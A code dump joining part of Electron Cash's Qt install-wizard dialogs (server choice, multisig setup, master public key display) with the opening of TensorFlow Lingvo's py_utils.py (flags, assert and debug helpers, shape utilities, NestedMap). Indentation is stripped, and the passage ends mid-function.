def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electron Cash communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electron Cash "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
network.auto_connect = (r == 0)
self.config.set_key('auto_connect', network.auto_connect, True)
if r == 1:
nlayout = NetworkChoiceLayout(self, network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(1)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
linux_hw_wallet_support_dialog = None
def on_hw_wallet_support(self):
''' Overrides base wizard's noop impl. '''
if sys.platform.startswith("linux"):
if self.linux_hw_wallet_support_dialog:
self.linux_hw_wallet_support_dialog.raise_()
return
# NB: this should only be imported from Linux
from . import udev_installer
self.linux_hw_wallet_support_dialog = udev_installer.InstallHardwareWalletSupportDialog(self.top_level_window(), self.plugins)
self.linux_hw_wallet_support_dialog.exec_()
self.linux_hw_wallet_support_dialog.setParent(None)
self.linux_hw_wallet_support_dialog = None
else:
self.show_error("Linux only facility. FIXME!")
|
py_utils.py
|
# Lint as: python2, python3
# -*- coding: utf-8 -*-
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as py_collections
import contextlib
import functools
import hashlib
import inspect
import math
import numbers
import os
import pkgutil
import re
import threading
import traceback
from REDACTED.tensorflow.compiler.xla.experimental.xla_sharding import xla_sharding
import REDACTED.transformer_lingvo.lingvo.compat as tf
from REDACTED.transformer_lingvo.lingvo.core import hyperparams
from REDACTED.transformer_lingvo.lingvo.core import ops
from REDACTED.transformer_lingvo.lingvo.core import retry
from REDACTED.transformer_lingvo.lingvo.core import symbolic
from REDACTED.transformer_lingvo.lingvo.core import tshape
import numpy as np
import six
from six.moves import range
from six.moves import zip
from REDACTED.google_research.model_pruning.python import pruning
# pylint: disable=g-direct-tensorflow-import
from REDACTED.tensorflow.core.framework import node_def_pb2
from REDACTED import rewriter_config_pb2
from REDACTED.tensorflow.python.framework import func_graph
from REDACTED.tensorflow.python.framework import function
from REDACTED.tensorflow.python.ops import init_ops
from REDACTED.tensorflow.python.tpu import tpu_function
from REDACTED.tensorflow.python.util import deprecation
# pylint: enable=g-direct-tensorflow-import
tf.flags.DEFINE_bool('enable_asserts', True,
'If False, we disable all asserts.')
tf.flags.DEFINE_bool('enable_check_numerics', True,
'If False, we bypass calls to CheckNumerics.')
tf.flags.DEFINE_bool('print_debug_tensors', False,
'Whether to print debug tensors.')
tf.flags.DEFINE_string(
'xla_device', '', 'If non-empty, can be cpu, gpu, or tpu (case sensitive)')
tf.flags.DEFINE_bool(
'use_resource_var', True,
'Use ResourceVariable instead of RefVariable; this option is '
'enabled by default and will be removed in the future.')
tf.flags.DEFINE_bool(
'tpu_compatible', False, 'Create variables in a way compatible with TPU. '
'This should be true for any job that will interact '
'with variables or a checkpoint that will be produced '
'or consumed by TPU')
tf.flags.DEFINE_bool(
'pin_vars_to_cpu', False,
'Pin variables to cpu:0. This is useful for weight-sharing / multi-core '
'inference on TPUs in which TPU core variables are managed via '
'TPUPartitionedCallOp.')
tf.flags.DEFINE_bool(
'no_identity_on_vars', False,
'Do not add tf.identity() on vars. This allows TPUPartitionedCallOp to use '
'variable handles directly for weight-sharing / multi-core '
'inference on TPUs.')
tf.flags.DEFINE_bool('disable_py_utils_debug', False,
'If True disables all py_utils.Debug() logs.')
# NOTE: Using absl flags in libraries are frowned upon for several reasons:
#
# 1) They require app.run() or explicit flag parsing, preventing the use of
# these libraries in environments that don't look like normal binaries (colab
# notebooks).
#
# 2) They are process-level globals that cannot be scoped or configured except
# once during binary startup.
#
# Because py_utils is a library, no more flags should be used in this file; the
# existing flags are present for backwards compatibility. Instead, consider
# using a stack-scoped configuration object such as the Cluster object. We guard
# against issue 1 above by using _FromGlobal below, which uses the default value
# of the FLAG even if flags are unparsed.
FLAGS = tf.flags.FLAGS
def _FromGlobal(field_name):
"""Get 'field_name' from a global configuration object.
Currently the global configuration object used is FLAGS, but this may
change to Cluster() or an equivalent stack-scoped config object.
Args:
field_name: The string field name to look up.
Returns:
The value associated with the global configuration string 'field_name'.
"""
# TODO(b/145831327): check the field name in the current cluster object.
# If explicitly set, use that value instead of using the FLAG value.
# Now check the FLAGS object for backwards compatibility.
#
# If not explicitly set, get the field from the FLAGS object. If FLAGS
# have not been parsed yet, the default value of the flag will be used.
return FLAGS[field_name].value
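# E.g., _FromGlobal('enable_asserts') reads FLAGS.enable_asserts, falling back
# to the flag's default value when flags have not been parsed yet.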
ENQUEUE_OPS = '__lingvo_enqueue_ops'
TPU_EMBEDDING_LOAD_OPS = '__lingvo_tpu_embedding_load_ops'
TPU_EMBEDDING_RETRIEVE_OPS = '__lingvo_tpu_embedding_retrieve_ops'
TPU_EMBEDDING = '__tpu_embedding'
TPU_EMBEDDING_ACTIVATIONS = '__tpu_embedding_activations'
# pylint: disable=protected-access
deprecation._PRINT_DEPRECATION_WARNINGS = False
# pylint: enable=protected-access
def Assert(condition, data, *args, **kwargs):
if _FromGlobal('enable_asserts'):
return tf.Assert(condition, data, *args, **kwargs)
else:
return tf.no_op()
def assert_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.debugging.assert_greater_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_greater(*args, **kwargs)
else:
return tf.no_op()
def assert_less_equal(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.debugging.assert_less_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_less(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return tf.assert_less(*args, **kwargs)
else:
return tf.no_op()
def assert_between(x, l, r, *args, **kwargs): # pylint: disable=invalid-name
return tf.group(
Assert(tf.reduce_all(tf.greater_equal(x, l)), [x], *args, **kwargs),
Assert(tf.reduce_all(tf.less(x, r)), [x], *args, **kwargs))
def assert_shape_match(*args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
kwargs['msg'] = 'BABELFISH ASSERT %s:%s(%s)' % (re.sub(
r'.*/', '', filepath), line, func)
return ops.assert_shape_match(*args, **kwargs)
else:
return tf.no_op()
def assert_same_dim0(xs, *args, **kwargs): # pylint: disable=invalid-name
if _FromGlobal('enable_asserts'):
return ops.assert_same_dim0(xs, *args, **kwargs)
else:
return tf.no_op()
def assert_even_divide(denorm, num): # pylint: disable=invalid-name
"""Asserts that denorm is evenly divided by num."""
denorm = tf.convert_to_tensor(denorm)
num = tf.convert_to_tensor(num)
if denorm.dtype not in (tf.int32, tf.int64):
raise ValueError('denominator.dtype is not tf.int32 or tf.int64.')
if num.dtype not in (tf.int32, tf.int64):
raise ValueError('numerator.dtype is not tf.int32 or tf.int64.')
num = HasShape(num, GetShape(denorm))
quo = denorm // num
return assert_equal(quo * num, denorm)
def _CheckNumerics(x, message=None, *args, **kwargs):
if x.dtype.is_floating:
if 'name' not in kwargs:
kwargs['name'] = re.sub(r':\d+', '', x.name) + '_CheckNumerics'
return tf.debugging.check_numerics(x, message if message else x.name, *args,
**kwargs)
else:
return x
def CheckNumerics(inp, message=None, *args, **kwargs):
"""Check numerics for tensors in inp."""
if not _FromGlobal('enable_check_numerics'):
return inp
if isinstance(inp, list):
return [_CheckNumerics(x, message, *args, **kwargs) for x in inp]
if isinstance(inp, tuple):
return tuple(_CheckNumerics(x, message, *args, **kwargs) for x in inp)
return _CheckNumerics(inp, message, *args, **kwargs)
def with_dependencies(dependencies, output_tensor): # pylint: disable=invalid-name
with tf.control_dependencies(dependencies):
return tf.identity(output_tensor)
@contextlib.contextmanager
def _PrintOptions(*args, **kwargs):
original = np.get_printoptions()
np.set_printoptions(*args, **kwargs)
yield
np.set_printoptions(**original)
def _Print(name, x):
with _PrintOptions(linewidth=1000):
tf.logging.info('%s = %s', name, np.array_repr(x))
def Log(value, prefix, **kwargs):
"""Prints out values of tensors.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Log(z, 'debug compute()', x=x, y=y)
Args:
value: A Tensor. Log happens after this tensor's computed.
prefix: Every tensor is logged with this prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
these keywords.
Returns:
value is returned.
"""
# Ensures tensors are printed in order.
last = value
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Print, [prefix + ' : ' + k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def Debug(tensor, message='', enabled=True, summarize=100, more=None):
"""Wrapper around tf.Print() and tf.logging.info() to simplify debug printing.
x = py_utils.Debug(x)
When the graph is built a regular log info line will be printed:
-DBG- py_utils_test.py:429 x=Tensor(...
Then when the tensor node is evaluated it will print lines like:
-DBG- py_utils_test.py:429 x Const:0[x.shape=][2 2][x=][[1 2][3 4]]
WARNING: The code that parses local variable names can fail. E.g. don't write
two Debug() calls on one line or a Debug() call that spans more than one line.
Args:
tensor: A tensor to print.
message: A message to print.
enabled: To enable the debugging.
summarize: Integer with number of tensor values to print.
more: An optional list of additional tensors.
Returns:
The tensor.
"""
if not enabled or _FromGlobal('disable_py_utils_debug'):
return tensor
if more is None:
more = []
stack = inspect.stack()[1][0]
caller = inspect.getframeinfo(stack)
caller_var = ''
caller_more_vars = []
if caller.code_context:
# Rough and likely to fail. But better than nothing.
caller_var = re.compile(r'Debug\((.*?)(\)|,).*$').search(
caller.code_context[0]).groups()[0]
if more:
more_vars = re.compile(r'more=\[(.*?)\].*$').search(
caller.code_context[0]).groups()[0]
caller_more_vars = more_vars.split(',')
the_class = ''
if 'self' in stack.f_locals:
the_class = stack.f_locals['self'].__class__.__name__
header = '-DBG- {}:{}:{}:{} {} '.format(
os.path.basename(caller.filename), the_class, caller.function,
caller.lineno, message)
info = '{}{}={}'.format(header, caller_var, tensor)
for name, val in zip(caller_more_vars, more):
info += ' {}={}'.format(name.strip(), val)
tf.logging.info(info)
if isinstance(tensor, tf.Tensor):
tensors = []
tensors += [tf.constant('{}.shape='.format(caller_var)), tf.shape(tensor)]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}.shape='.format(name.strip())), tf.shape(val)]
tensors += [tf.constant('{}='.format(caller_var)), tensor]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}='.format(name.strip())), val]
info = '{}{} {}'.format(header, caller_var, tensor.name)
return tf.Print(tensor, tensors, info, summarize=summarize)
return tensor
def _Save(steps, prefix, key, val):
filename = '%s.%08d.%s.npy' % (six.ensure_text(prefix), steps,
six.ensure_text(key))
with tf.io.gfile.GFile(filename, 'w') as outfile:
np.save(outfile, val)
def Save(value, filename_prefix, **kwargs):
"""Saves values of tensors into files.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Save(z, '/path/tmp', x=x, y=y, z=z)
Args:
value: A Tensor. Saving happens after this tensor is computed.
filename_prefix: Every tensor is saved with this filename prefix.
**kwargs: keywords and tensors. Tensors are saved in the sort order of
these keywords.
Returns:
value is returned.
"""
last = value
steps = GetGlobalStep()
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Save, [steps, filename_prefix, k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def HasRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has the expected rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims == expected_rank, (
'Ranks did not match, got %d, '
'expected %d') % (tensor.shape.ndims, expected_rank)
return tensor
if _FromGlobal('enable_asserts'):
return with_dependencies([tf.assert_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def HasAtLeastRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has rank >= expected_rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims >= expected_rank, (
'Rank of tensor %d is less than the expected minimum %d.') % (
tensor.shape.ndims, expected_rank)
return tensor
if _FromGlobal('enable_asserts'):
return with_dependencies(
[tf.debugging.assert_greater_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def GetRank(tensor):
"""Returns tensor's rank as an int if it's available, otherwise a Tensor.
Args:
tensor: The input tensor.
Returns:
Either an int or a Tensor for the rank of the input tensor.
"""
if tensor.shape.ndims is not None:
return tensor.shape.ndims # int
else:
return tf.rank(tensor) # Tensor
def HasShape(tensor, expected_shape, ndims=None):
"""Syntactic sugar for asserting that tensor has the expected shape.
Args:
tensor: A Tensor.
expected_shape: A Python list or a 1D tensor.
ndims: If not None, check only the first `ndims` dimensions of `tensor`.
Must be equal to the length of `expected_shape` if not None.
Returns:
The input `tensor`
Raises:
A runtime error if the assertion fails.
"""
if _FromGlobal('enable_asserts'):
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
msg = 'BABELFISH ASSERT %s:%s(%s)' % (re.sub(r'.*/', '',
filepath), line, func)
return with_dependencies([
ops.assert_shape_match(
tf.shape(tensor)[:ndims], expected_shape, msg=msg)
], tensor)
else:
return tensor
def GetShape(tensor, ndims=None):
"""Returns tensor's shape as a list which can be unpacked, unlike tf.shape.
Tries to return static shape if it's available. Note that this means
some of the outputs will be ints while the rest will be Tensors.
Args:
tensor: The input tensor.
ndims: If not None, returns the shapes for the first `ndims` dimensions.
"""
tensor = tf.convert_to_tensor(tensor)
dynamic_shape = tf.shape(tensor)
# Early exit for unranked tensor.
if tensor.shape.ndims is None:
if ndims is None:
return dynamic_shape
else:
return [dynamic_shape[x] for x in range(ndims)]
# Ranked tensor.
if ndims is None:
ndims = tensor.shape.ndims
else:
ndims = min(ndims, tensor.shape.ndims)
# Return mixture of static and dynamic dims.
static_shape = tensor.shape.as_list()
shapes = [
static_shape[x] if static_shape[x] is not None else dynamic_shape[x]
for x in range(ndims)
]
return shapes
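# E.g., for a tensor whose static shape is [None, 8], GetShape() returns
# [<scalar int32 Tensor>, 8]: unknown dims come from tf.shape() while known
# dims stay Python ints, so the result can be unpacked like a list.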
def GetSize(tensor):
shape = GetShape(tensor)
if (isinstance(shape, tf.Tensor) or
any([isinstance(x, tf.Tensor) for x in shape])):
return tf.size(tensor)
return np.prod(shape)
def use_xla(): # pylint: disable=invalid-name
res = _FromGlobal('xla_device')
if res:
assert res in ('', 'cpu', 'gpu', 'tpu')
return res
def use_tpu(): # pylint: disable=invalid-name
res = _FromGlobal('xla_device') == 'tpu'
if res:
assert not _FromGlobal('enable_asserts') # asserts not supported on tpu
return res
def tpu_compat(): # pylint: disable=invalid-name
return use_tpu() or _FromGlobal('tpu_compatible')
def use_resource_variables(): # pylint: disable=invalid-name
return _FromGlobal('use_resource_var') or tpu_compat()
@contextlib.contextmanager
def outside_all_rewrites(): # pylint: disable=invalid-name
with tf.control_dependencies(None):
yield
class _ThreadLocalStack(threading.local):
def __init__(self):
super(_ThreadLocalStack, self).__init__()
self.stack = []
# TODO(jamesqin): remove once b/147439702 is fixed.
_OUTSIDE_COMPILATION = threading.local()
def RunOnTpuHost(func, *args, **kwargs):
r"""Runs the given function call on TPU host.
Invokes func(\*args, \*\*kwargs) directly if not running on tpu.
Args:
func: the function to invoke.
*args: args of func
**kwargs: kwargs of func
Returns:
The function return value.
"""
if use_tpu() and not getattr(_OUTSIDE_COMPILATION, 'on', False):
_OUTSIDE_COMPILATION.on = True
res = tf.tpu.outside_compilation(func, *args, **kwargs)
_OUTSIDE_COMPILATION.on = False
else:
res = func(*args, **kwargs)
return res
def tpu_host(func): # pylint: disable=invalid-name
r"""Decorates a python function to only run on TPU hosts.
This function has no effect when running on CPU/GPU.
Example::
@py_utils.tpu_host()
def ComputeWER(self):
# Call a custom op computing WER.
Args:
func: the function to invoke
Returns:
A TPU-host only function
"""
def Wrapped(*args, **kwargs):
return RunOnTpuHost(func, *args, **kwargs)
return Wrapped
_tpu_device_assignment = None
def SetTpuDeviceAssignment(tpu_device_assignment):
global _tpu_device_assignment
if _tpu_device_assignment is not None:
tf.logging.warning('tpu_device_assignment was already set, '
'overwriting with new assignment.')
_tpu_device_assignment = tpu_device_assignment
# This function should be called in unit tests only.
def ClearTpuDevice():
global _tpu_device_assignment
_tpu_device_assignment = None
def GetTpuDeviceAssignment():
return _tpu_device_assignment
def SessionConfig(soft_placement=True,
inline=True,
cluster_def=None,
disable_meta_optimizer=False):
"""Returns a session config proto.
Args:
soft_placement: Turns allow_soft_placement on iff True.
inline: Turns do_function_inlining on iff True.
cluster_def: A tf.train.ClusterDef describing the cluster.
disable_meta_optimizer: Turns off grappler/metagraph optimizer.
Returns:
A TF session config proto.
"""
session_config = tf.config_pb2.ConfigProto(
allow_soft_placement=soft_placement,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L1, do_function_inlining=inline)),
cluster_def=cluster_def)
if disable_meta_optimizer:
# Useful if start-up time is critical.
session_config.graph_options.rewrite_options.disable_meta_optimizer = True
# Disable layout optimizer which increases GPU memory usage.
session_config.graph_options.rewrite_options.layout_optimizer = (
rewriter_config_pb2.RewriterConfig.OFF)
return session_config
def AssertIsCompatible(a, b):
assert a.IsCompatible(b), ('%s vs %s' % (a, b))
def SetShapes(dst_nmap, src_nmap):
"""Set shapes in dst_nmap using those in src_nmap."""
AssertIsCompatible(src_nmap, dst_nmap)
for src, dst in zip(src_nmap.Flatten(), dst_nmap.Flatten()):
dst.set_shape(src.shape)
def Dtypes(nmap_list):
"""Returns all tensors' data types in a list."""
return [v.dtype for v in Flatten(nmap_list)]
def Flatten(x):
"""Flattens 'x' by extracting tensors from nested structures to a list."""
return tf.nest.flatten(x)
def Pack(tmpl, values):
"""Packs 'values' according to 'tmpl'."""
return tf.nest.pack_sequence_as(tmpl, values)
def Transform(fn, *v):
"""Replaces every nested value x in 'v' with fn(x) and returns the result."""
return tf.nest.map_structure(fn, *v)
def IsCompatible(lhs, rhs):
"""Returns true if lhs and rhs are compatible."""
try:
tf.nest.assert_same_structure(lhs, rhs)
return True
except (ValueError, TypeError):
return False
_NAME_PATTERN = re.compile('[A-Za-z_][A-Za-z0-9_]*')
class NestedMap(dict):
"""A simple helper to maintain a dict.
It is a sub-class of dict with the following extensions/restrictions:
- It supports attr access to its members (see examples below).
- Member keys have to be valid identifiers.
E.g.::
>>> foo = NestedMap()
>>> foo['x'] = 10
>>> foo.y = 20
>>> assert foo.x * 2 == foo.y
"""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
# keys in this list are not allowed in a NestedMap.
_RESERVED_KEYS = set(dir(dict))
# sentinel value for deleting keys used in Filter.
_DELETE = object()
def __init__(self, *args, **kwargs):
super(NestedMap, self).__init__(*args, **kwargs)
for key in self.keys():
assert isinstance(key, six.string_types), (
'Key in a NestedMap has to be a six.string_types. Currently type: %s,'
' value: %s' % (str(type(key)), str(key)))
NestedMap.CheckKey(key)
assert key not in NestedMap._RESERVED_KEYS, ('%s is a reserved key' % key)
def __setitem__(self, key, value):
# Make sure key is a valid expression and is not one of the reserved
# attributes.
assert isinstance(key, six.string_types), (
'Key in a NestedMap has to be a six.string_types. Currently type: %s, '
'value: %s' % (str(type(key)), str(key)))
NestedMap.CheckKey(key)
assert key not in NestedMap._RESERVED_KEYS, ('%s is a reserved key' % key)
super(NestedMap, self).__setitem__(key, value)
def __setattr__(self, name, value):
self.__setitem__(name, value)
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError('%s; available attributes: %s' %
(e, sorted(list(self.keys()))))
def __delattr__(self, name):
try:
del self[name]
except KeyError as e:
raise AttributeError('%s; available attributes: %s' %
(e, sorted(list(self.keys()))))
def copy(self): # Don't delegate w/ super: dict.copy() -> dict.
return NestedMap(self)
def __deepcopy__(self, unused_memo):
"""Deep-copies the structure but not the leaf objects."""
return self.DeepCopy()
def DeepCopy(self):
"""Deep-copies the structure but not the leaf objects."""
return self.Pack(self.Flatten())
@staticmethod
def FromNestedDict(x):
"""Converts every dict in nested structure 'x' to a NestedMap."""
if isinstance(x, dict):
res = NestedMap()
for k, v in six.iteritems(x):
res[k] = NestedMap.FromNestedDict(v)
return res
elif isinstance(x, (list, tuple)):
return type(x)(NestedMap.FromNestedDict(v) for v in x)
else:
return x
@staticmethod
def CheckKey(key):
"""Asserts that key is valid NestedMap key."""
if not (isinstance(key, six.string_types) and _NAME_PATTERN.match(key)):
raise ValueError('Invalid NestedMap key \'{}\''.format(key))
def GetItem(self, key):
"""Gets the value for the nested `key`.
Note that indexing lists is not supported; names with underscores are
considered a single key.
Args:
key: str of the form
`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
Returns:
The value for the given nested key.
Raises:
KeyError if a key is not present.
"""
current = self
# Note: This can't support lists. List keys are ambiguous as underscore is
# not reserved for list indexing but also allowed to be used in keys.
# E.g., this is a valid nested map where the key 'a_0' is not well defined
# {'a_0': 3, 'a': [4]}.
for k in key.split('.'):
current = current[k]
return current
def Get(self, key, default=None):
"""Gets the value for nested `key`, returns `default` if key does not exist.
Note that indexing lists is not supported; names with underscores are
considered a single key.
Args:
key: str of the form
`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
default: Optional default value, defaults to None.
Returns:
The value for the given nested key or `default` if the key does not exist.
"""
try:
return self.GetItem(key)
# TypeError is raised when an intermediate item is a list and we try to
# access an element of it with a string.
except (KeyError, TypeError):
return default
def Set(self, key, value):
"""Sets the value for a nested key.
Note that indexing lists is not supported; names with underscores are
considered a single key.
Args:
key: str of the form
`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
value: The value to insert.
Raises:
ValueError if a sub key is not a NestedMap or dict.
"""
current = self
sub_keys = key.split('.')
for i, k in enumerate(sub_keys):
self.CheckKey(k)
# We have reached the terminal node, set the value.
if i == (len(sub_keys) - 1):
current[k] = value
else:
if k not in current:
current[k] = NestedMap()
if not isinstance(current[k], (dict, NestedMap)):
raise ValueError('Error while setting key {}. Sub key "{}" is of type'
' {} but must be a dict or NestedMap.'
''.format(key, k, type(current[k])))
current = current[k]
def _RecursiveMap(self, fn, flatten=False):
"""Traverse recursively into lists and NestedMaps applying `fn`.
Args:
fn: The function to apply to each item (leaf node).
flatten: If true, the result should be a single flat list. Otherwise the
result will have the same structure as this NestedMap.
Returns:
The result of applying fn.
"""
def Recurse(v, key=''):
"""Helper function for _RecursiveMap."""
if isinstance(v, NestedMap):
ret = [] if flatten else NestedMap()
deleted = False
for k in sorted(v.keys()):
res = Recurse(v[k], key + '.' + k if key else k)
if res is self._DELETE:
deleted = True
continue
elif flatten:
ret += res
else:
ret[k] = res
if not ret and deleted:
return self._DELETE
return ret
elif isinstance(v, list):
ret = []
deleted = False
for i, x in enumerate(v):
res = Recurse(x, '%s[%d]' % (key, i))
if res is self._DELETE:
deleted = True
continue
elif flatten:
ret += res
else:
ret.append(res)
if not ret and deleted:
return self._DELETE
return ret
else:
ret = fn(key, v)
if flatten:
ret = [ret]
return ret
res = Recurse(self)
if res is self._DELETE:
return [] if flatten else NestedMap()
return res
def Flatten(self):
"""Returns a list containing the flattened values in the `.NestedMap`.
Unlike py_utils.Flatten(), this will only descend into lists and NestedMaps
and not dicts, tuples, or namedtuples.
"""
return self._RecursiveMap(lambda _, v: v, flatten=True)
def FlattenItems(self):
"""Flatten the `.NestedMap` and returns <key, value> pairs in a list.
Returns:
A list of <key, value> pairs, where keys for nested entries will be
represented in the form of `foo.bar[10].baz`.
"""
return self._RecursiveMap(lambda k, v: (k, v), flatten=True)
def Pack(self, lst):
"""Returns a copy of this with each value replaced by a value in lst."""
assert len(self.FlattenItems()) == len(lst)
v_iter = iter(lst)
return self._RecursiveMap(lambda unused_k, unused_v: next(v_iter))
def Transform(self, fn):
"""Returns a copy of this `.NestedMap` with fn applied on each value."""
return self._RecursiveMap(lambda _, v: fn(v))
def IsCompatible(self, other):
"""Returns true if self and other are compatible.
If x and y are two compatible `.NestedMap`, `x.Pack(y.Flatten())` produces y
and vice versa.
Args:
other: Another `.NestedMap`.
"""
items = self._RecursiveMap(lambda k, _: k, flatten=True)
other_items = other._RecursiveMap(lambda k, _: k, flatten=True) # pylint: disable=protected-access
return items == other_items
def Filter(self, fn):
"""Returns a copy with entries where fn(entry) is True."""
return self.FilterKeyVal(lambda _, v: fn(v))
def FilterKeyVal(self, fn):
"""Returns a copy of this `.NestedMap` filtered by fn.
If fn(key, entry) is True, the entry is copied into the returned NestedMap.
Otherwise, it is not copied.
Args:
fn: a callable of (string, entry)->boolean.
Returns:
A `.NestedMap` containing copied entries from this `.NestedMap`.
"""
return self._RecursiveMap(lambda k, v: v if fn(k, v) else self._DELETE)
def _ToStrings(self):
"""Returns debug strings in a list for this `.NestedMap`."""
kv = self.FlattenItems()
maxlen = max([len(k) for k, _ in kv]) if kv else 0
return sorted([k + ' ' * (4 + maxlen - len(k)) + str(v) for k, v in kv])
def DebugString(self):
"""Returns a debug string for this `.NestedMap`."""
return '\n'.join(self._ToStrings())
def VLog(self, level=None, prefix=None):
"""Logs the debug string at the level."""
if level is None:
level = 0
if prefix is None:
prefix = 'nmap: '
for l in self._ToStrings():
tf.logging.vlog(level, '%s %s', prefix, l)
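# Illustrative NestedMap usage (based on the methods above):
#   m = NestedMap()
#   m.Set('encoder.hidden_dim', 128)     # intermediate NestedMaps are created
#   assert m.Get('encoder.hidden_dim') == 128
#   assert m.Get('encoder.missing', 0) == 0
#   flat = m.Flatten()                   # leaves, sorted by key -> [128]
#   m2 = m.Pack([256])                   # same structure, new leaf values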
class _Unique(object):
"""A helper to uniqify variables in a NestedMap."""
def __init__(self):
self._vset = set()
def __call__(self, v):
if (v is None) or (id(v) in self._vset):
return False
else:
self._vset.add(id(v))
return True
def ToUniqueList(nmap):
"""Returns the flattened `nmap` with duplicates removed."""
return nmap.Filter(_Unique()).Flatten()
def ReadOnlyAttrDictView(backing):
"""Wraps a dict to provide a read-only view of its contents.
Dict keys can also be accessed by attribute.
Args:
backing: Dict-like object to wrap.
Returns:
Read-only Mapping that can be accessed by index (['foo']) or attr (d.foo).
"""
class Wrapper(object):
"""Wrapper object."""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
def __getitem__(self, key):
return backing[key]
def __len__(self):
return len(backing)
def __iter__(self):
return iter(backing)
def __getattr__(self, key):
return backing[key]
def __hasattr__(self, key):
return key in backing
def __setattr__(self, key, value):
raise AttributeError('Dictionary is read-only.')
def __setitem__(self, key, value):
raise AttributeError('Dictionary is read-only.')
return Wrapper()
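# E.g.:
#   view = ReadOnlyAttrDictView({'foo': 1})
#   view.foo == view['foo'] == 1
#   view.foo = 2   # raises AttributeError('Dictionary is read-only.')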
def ToStaticShape(shape):
"""Converts 'shape' to a static shape."""
if isinstance(shape, (list, tuple)):
shape = [
dim.value if isinstance(dim, tf.Dimension) else dim for dim in shape
]
static_shape = []
for dim in shape:
if symbolic.IsExpr(dim):
